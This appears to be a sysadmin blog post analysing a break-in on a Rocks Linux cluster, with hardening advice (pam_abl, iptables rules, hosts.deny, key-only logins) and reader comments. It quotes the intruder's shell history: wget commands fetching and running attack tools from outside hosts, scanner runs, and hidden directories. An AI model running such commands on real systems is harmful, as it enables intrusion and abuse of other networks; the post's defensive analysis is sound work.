Hardening security on your Rocks system(s)

We now understand the attack vector. Turned out to be simple, and some of the things we have done have now closed that door. It was a pretty simple door, but still worth noting. BTW: some don’t like early disclosures of exploits. I have heard from ~6 people (off the Rocks list) since posting that they have seen similar attacks attempted.

The entry point was via a shared user account. Once this account was compromised, our new friend from Romania started working. We found this (cluster name changed to protect the compromised):

[root@xxxxx user]# ls -alFt | head -10
total 2980
drwxr-xr-x   6 root root       0 Oct 23 14:40 ../
drwx------   7 user user    4096 Oct 23 12:05 ./
drwxr-xr-x   2 user user    4096 Oct 23 12:05 bodo-scan/
drwxr-xr-x   2 user user    4096 Oct 23 12:05 chyna/
-rw-------   1 user user    7894 Oct 23 00:18 .bash_history 

and in these directories, we found

[root@xxxxx user]# ls bodo-scan/ chyna
112.pscan.22  a   a3    common       go.sh    pass_file    pico    ss
93.pscan.22   a2  auto  gen-pass.sh  mfu.txt  pass_filees  pscan2  start

152,.2.pscan.22  72.20.pscan.22  core      pass1          pscan2  vuln.txt
152.2.pscan.22   79.36.pscan.22  go.sh     pass1.save     screen
189.81.pscan.22  a               help.txt  pass_file      ss
61.168.pscan.22  checkroot       mass      pass_file.bak  usage

Hmmm. Reports from the network monitoring team seemed to indicate that this unit was scanning at a massive rate. It knocked portions (as we were told) of this university off the net for a few hours last night.

Ok, we see suspicious files in an account that shouldn’t be, but was shared. Any thing more concrete?


These folks left their .bash_history chock full of what they did. They were obviously trying to p0wn the machine. It didn’t start to get interesting until here:

nano vuln.txt
./unix 129.219
cd /dev/shm

ok … they have my attention. Here is where it gets exciting. Remember that little kernel vulnerability from a few months ago? The one where you could force a system call to fail in a particular way, and get root? The one where, if you have not patched your kernel in a few months you are at risk?

They did try that as far as I can tell.

Since this was a patched system, going so far as to replacing the standard ssh daemon with an updated one reflecting the latest security and bug patches, removing all extraneous packages (there are still a few too many, and we needed to pull them off), it appears they gave up on trying to crack that system, and instead tried to turn it into a scanner. This they were successful at doing.

/start 66.233
./start 66.234
./start 66.235
./start 66.236
./start 66.239
./start 66.240
./start 66.246
./start 66.247 


chmod +x *
./a 152,.2
./a 152.2
./a 79.33
./a 79.34
./a 79.35
./a 79.36
./a 82.114
./a 82.115
./a 61.168
./a 189.81
./a 67.233
./a 61.168
./a 72.20 

not to mention attempting non-secure port bots:

cd ..
mkdir "  "
cd "  "
wget wget
ps x
cd /var/tmp
ls -a
cd /tmp
ls -a
cd team2
nano vuln.txt
cd /dev/shm 

Notice the name of the directory they made. Look closely at the mkdir.

Now if this isn’t bad enough, look at this:

mkdir " "
cd " "
wget members.lycos.co.uk/sonnyremote/psy.tar
tar xzvf psy.tar
rm -rf psy.tar
cd .bash
export PATH=:.
ps -ax 

They are still trying to gain root.

And pulling down tool after tool to do so.

Finally they went for broke, pulling down tools from a number of sites:

wget http://Linux-Help.clan.su/download/psybnc-linux.tgz
wget http://nasaundernet.is-the-boss.com/psybnc-linux.tgz
tar zxvf psybnc-linux.tgz
cd psybnc-linux ; cd psybnc
mv psybnc bash
chmod +x * ; sh
PATH=:$PATH ; bash
PATH=:$PATH ; bash 

and gave up with simple udp traffic generators which I won’t replicate here.

Ok, what lessons can we learn from this, and how can we harden the systems? My initial guess of a root exploit was not fully correct. They tried it, didn’t get there, and achieved secondary goals.

Their goals appear to be, in approximate order:

1) p0wn the machine (take complete control of it)

2) if #1 isn’t possible, then try to turn it into a bot of some sort

3) if #2 isn’t possible, then try to turn it into a traffic generator and take down nets.

4) in all cases, prep for the next attack, making sure you have multiple possible attack vectors, so poison the other ~/.ssh/authorized_keys files, ~/.rhosts files, ~/.shosts files, …

I am guessing I am approximately right, and I am sure that this can be refined quite a bit.

So how do we stop this? I’ll talk in the context of Rocks cluster(s), but it applies to all (Linux) clusters.

User policy:

1) [mandate] no sharing of accounts. This is verboten. It is easy enough to socially engineer someone into running something they shouldn’t. See all those nice “export PATH=…” things? What happens if root gets into that account, with the path set to look at the local (compromised) path first, before the normal path? Or an end user?

2) [suggestion] consider turning off suid on the mount (e.g. use the “nosuid” mount option). This should not impact any users. If it does, you need to speak with them about why they need suid access, and see if another method will work. This is, curiously related to the original attack vector assumption based upon a previous compromise of this system.


1) [strongly urged] use pam_abl. This provides support in the pam layer for banning users based upon failed logins. This is similar to fail2ban, with the advantage that since it works at the pam layer, it can be used for ftp as well as ssh and other login services using pam.

You have to create an /etc/security/pam_abl.conf file, and add an entry into your /etc/pam.d/ service where you want to use it. For example

# /etc/security/pam_abl.conf

and our /etc/pam.d/sshd file should include this line after the pam_env line:

auth required /lib/security/pam_abl.so config=/etc/security/pam_abl.conf

2) [strongly urged] for any nodes with public IP addresses, limit the range of destination ports using IP tables. Someone wants to ssh or wget or ftp a file, sure. Disable most other public access. I am not a fan of IPtables on compute nodes, but when we do mission these as login nodes, and purposefully remove as much as possible, this configuration is definitely advised.

Here is a good /etc/sysconfig/iptables file looks like for these nodes


# Preamble
-A FORWARD -i eth1 -o eth0 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -j ACCEPT
-A INPUT -i eth0 -j ACCEPT
-A INPUT -i lo -j ACCEPT

# Allow these ports
-A INPUT -m state --state NEW -p tcp --dport ssh -j ACCEPT
# Uncomment the lines below to activate web access to the cluster.
-A INPUT -m state --state NEW -p tcp --dport https -j ACCEPT
-A INPUT -m state --state NEW -p tcp --dport www -j ACCEPT
-A INPUT -i eth0 -p udp --dport 53 -j ACCEPT

# Standard rules
-A INPUT -p icmp --icmp-type any -j ACCEPT
# Uncomment the line below to log incoming packets.
#-A INPUT -j LOG --log-prefix "Unknown packet:"

# Deny section
-A INPUT -p udp --dport 0:1024 -j REJECT
-A INPUT -p tcp --dport 0:1024 -j REJECT
# Block incoming ganglia packets on public interface.
-A INPUT -p udp --dport 8649 -j REJECT

# specific rejects for security
-A INPUT -p tcp --dport 3306 -i eth1 -j REJECT
-A INPUT -p tcp --dport 111 -i eth1 -j REJECT
-A INPUT -p udp --dport 111 -i eth1 -j REJECT
-A INPUT -p tcp --dport 25 -i eth1 -j REJECT
-A INPUT -p tcp --dport 199 -i eth1 -j REJECT
-A INPUT -p tcp --dport 536 -i eth1 -j REJECT
-A INPUT -p tcp --dport 852 -i eth1 -j REJECT
-A INPUT -p tcp --dport 873 -i eth1 -j REJECT
-A INPUT -p tcp --dport 910 -i eth1 -j REJECT
-A INPUT -p tcp --dport 2049 -i eth1 -j REJECT
-A INPUT -p udp --dport 2049 -i eth1 -j REJECT
-A INPUT -p tcp --dport 32774 -i eth1 -j REJECT

# For a draconian "drop-all" firewall, uncomment the line below.

Could be improved.

3) [strongly urged] for any nodes with public IP addresses, make sure you have /etc/hosts.deny and /etc/hosts.allow set up appropriately. Actively deny everything by default, and only allow what you need.

Here is a good /etc/hosts.deny

# hosts.deny This file describes the names of the hosts which are
# *not* allowed to use the local INET services, as decided
# by the ‘/usr/sbin/tcpd’ server.
# The portmap line is redundant, but it is left to remind you that
# the new secure portmap uses hosts.deny and hosts.allow. In particular
# you should know that NFS uses portmap!

portmap: ALL
http: ALL

Here is a good /etc/hosts.allow
# hosts.allow This file describes the names of the hosts which are
# allowed to use the local INET services, as decided
# by the ‘/usr/sbin/tcpd’ server.

sshd: ALL

4) [strongly recommended] set up minimal sudo access to handle specific end user occasional needs. Do not let users run as root. There is no reason to.

5) [strongly recommended] pro-active login monitoring. Is who is on your system supposed to be who is on your system? If you have 10 users spread out all over, this is hard. If you have 20, it is very hard. You should try to get users to let you know from where they are coming from, so that you can see if it really was them. Because a login gone wrong can do great damage.

6) [strongly recommended] no passwords. Keys for all, and for all, keys. Keyloggers can’t grab passwords that are never typed. It is possible (and not to hard) to coax putty to use keys. MacOSX can do this as well as it and the ssh in Linux are quite similar. Keys should be refreshed. Contents of ~/.ssh/authorized_keys should be flushed and controlled.

There are a few other things I can probably think of, but this is it for the moment for this post. We are going to implement other techniques for some of our customers which should provide them even better protection, even against errant port scanners and other annoying crackers.

Regardless of that, please do patch your systems. Especially if your kernel is more than a few months old.

Viewed 9020 times by 2320 viewers


9 thoughts on “Hardening security on your Rocks system(s)

  1. As far as keys go, we like to use the following sshd_config option for the frontend:

    AuthorizedKeysFile /etc/ssh/users/%u.pub

    Then the normal ~/.ssh/authorized_keys for all other nodes (who cares if it is only used for private vlan access control).

    Then install only the external keys we bless (one per user/person) on the frontend in a root-controlled directory. This prevents people from getting in once, grabbing the Rocks-created passphrase-less key, and storing it for later, then getting in anytime in the future.

  2. Good idea, thanks for pointing this out.

    We have some interesting ideas we are testing. If they work, we will put up some info on them.

  3. BTW: A few years ago, I wrote danger. This was supposed to something similar to DenyHosts. Some folks are still using it. We use it to generate input for /etc/hosts.deny. I like pam_abl a bit better than danger, but people are welcome to use/extend this.

  4. I should also point out that Rocks should not be harder to keep updated than Redhat in general. We have successfully used yum with some surgical precision to update out of date packages.

    The kernel (the exposed kernels) are the big ones, followed closely by the other security patches.

  5. A lot of my qualms with keeping Rocks up to date are actually with Redhat. However, I *really* don’t like the direction Rocks devs have gone regarding moving their software/deps out of the tree (everything from ls to mysqld). A fork of a fork will have significantly less eyes on it than the original. Since Rocks is a cluster distribution/integration (likely running a lot of expensive equipment) it is a high value target for the bad guys. That combo is not good for security.

    BTW, we use cobbler/koan for one cluster and it seems to be doing a lot of the same things Rocks does but plays nice with yum. There is even talk of debian-based distribution support. It doesn’t have some of the Rocks niceties like torrent-based installer but if yum update works maybe that would be unnecessary? I only run medium-sized clusters (< 300 nodes) so maybe it would only benefit the smaller installations like mine. In any case, it’s worth checking out if you haven’t already.

  6. Oh ya, on the list you mentioned the attackers changed out the kernel. We prevent kernel-based rootkits on our other machines using paravirtualization (mostly xen but we’re hoping kvm will get there soon). It seems to work well since the domU’s kernel is loaded from the dom0. So an attacker that has root on the domU can’t do much with the kernel (but perhaps load kernel modules if enabled). I’ve always wanted this kind of setup for my Rocks frontends.

  7. Well, I can understand some of their issues. Way early on, they effectively over-rode useradd and other tools. This separate tree was largely used for this.

    For some of our software, we have been blown away at how crappy some of the distro tools are. Specifically their perl builds, and in the past the apache builds. The latter have improved (maybe I am just too ubuntu focused, apache2 doesn’t suck there). I don’t blame them for wanting to preserve what they do via the tree. I would prefer as little as possible there, but we have found we build our kit that something in the distro is, well, not quite right. After a while we have a large tree.

    This bugs me too. But the alternative is, sometimes, code that doesn’t run.

    So I don’t fault them for it. I understand it. It does make sense for some tools they need.

    This said, I think they should get away from mysql. And anacoda give me fits outside of Rocks. I’ve taken to defensive installations. Minimal on the head node and minimal rolls, our finishing scripts or other mechanisms to do the rest of the heavy lifting, when we use Rocks. As we are using other things as well, our stuff has to be consistent across systems.

    But the out-of-distro-tree is ok for some of the tools. One thing we do is to use alternative ports for different things (databases, web servers, etc), so we don’t have to interfere with the distro tools.

  8. The problem with Rocks is that updating (patching) the cluster is not workable. Surprisingly the team is least concerned about updates. This is the end result of that bad design decision.

    Which is THE reason I stopped using Rocks and moved to xCAT (v2 is OSS)

Comments are closed.